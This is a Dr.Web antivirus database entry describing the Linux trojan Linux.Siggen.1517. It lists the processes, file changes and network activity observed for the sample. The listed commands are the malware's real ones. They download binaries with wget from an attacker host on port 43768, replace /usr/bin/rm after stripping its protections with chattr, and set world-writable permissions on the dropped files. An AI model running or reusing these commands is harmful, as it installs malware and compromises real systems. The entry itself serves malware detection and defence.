Per il corretto funzionamento del sito, è necessario attivare il supporto di JavaScript nel browser.
Linux.Siggen.1517
Aggiunto al database dei virus Dr.Web:
2019-03-17
La descrizione è stata aggiunta:
2019-03-16
Technical Information
Malicious functions:
Launches itself as a daemon
Launches processes:
sh -c echo 123 > /etc/velog
sh -c wget -P /etc -t 3 --quiet -T 20 http://w.3ei.xyz:43768/pvds2
wget -P /etc -t 3 --quiet -T 20 http://w.3ei.xyz:43768/pvds2
sh -c mv /etc/pvds2 /etc/pvds
mv /etc/pvds2 /etc/pvds
sh -c wget -P /etc -t 3 --quiet -T 20 http://w.3ei.xyz:43768/httpdz
wget -P /etc -t 3 --quiet -T 20 http://w.3ei.xyz:43768/httpdz
sh -c chmod 777 /etc/httpdz
chmod 777 /etc/httpdz
sh -c wget -P /etc -t 3 --quiet -T 20 http://w.3ei.xyz:43768/migrations
wget -P /etc -t 3 --quiet -T 20 http://w.3ei.xyz:43768/migrations
sh -c chmod 777 /etc/migrations
chmod 777 /etc/migrations
sh -c chattr -ia /usr/bin/rm
chattr -ia /usr/bin/rm
sh -c mv /usr/bin/rm /usr/bin/rmm
mv /usr/bin/rm /usr/bin/rmm
sh -c wget -P /usr/bin -t 3 --quiet -T 20 http://w.3ei.xyz:43768/rm
wget -P /usr/bin -t 3 --quiet -T 20 http://w.3ei.xyz:43768/rm
sh -c chmod 777 /usr/bin/rm
chmod 777 /usr/bin/rm
sh -c cp <SAMPLE_FULL_PATH> /etc/initdz
cp <SAMPLE_FULL_PATH> /etc/initdz
sh -c chmod 777 /etc/initdz
chmod 777 /etc/initdz
sh -c echo divg > /etc/rzx
sh -c ps -fe|grep divg |grep -v grep|grep -v defunct
grep divg
grep -v grep
ps -fe
grep -v defunct
sh -c cp /etc/pvds /etc/divg
cp /etc/pvds /etc/divg
sh -c chmod 777 /etc/divg
chmod 777 /etc/divg
divg
sh -c curl --connect-timeout 10 --max-time 30 --retry 3 icanhazip.com
sh -c url --connect-timeout 10 --max-time 30 --retry 3 icanhazip.com
sh -c ps -fe|grep migrations |grep -v grep|grep -v defunct
grep migrations
Performs operations with the file system:
Modifies file access rights:
/etc/httpdz
/etc/migrations
/usr/bin/rm
/etc/initdz
/etc/divg
Creates or modifies files:
/etc/velog
/etc/pvds2
/etc/httpdz
/etc/migrations
/usr/bin/rm
/etc/initdz
/etc/rzx
/etc/divg
Network activity:
Establishes connection:
<LOCAL_DNS_SERVER>
47.###.190.245:13531
HTTP GET requests:
w.###.#yz:43768/pvds2
w.###.#yz:43768/httpdz
w.###.##z:43768/migrations
w.###.xyz:43768/rm
DNS ASK:
Sends data to the following servers:
Receives data from the following servers:
Other:
Collects CPU information
Collects RAM information
Collects information about network activity
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
Scaricate Dr.Web per Android
Gratis per 3 mesi
Tutti i componenti di protezione
Rinnovo versione di prova tramite AppGallery/Google Pay
Continuando a utilizzare questo sito, l'utente acconsente al nostro utilizzo di file Cookie e di altre tecnologie per la raccolta di informazioni statistiche sui visitatori. Per maggiori informazioni
OK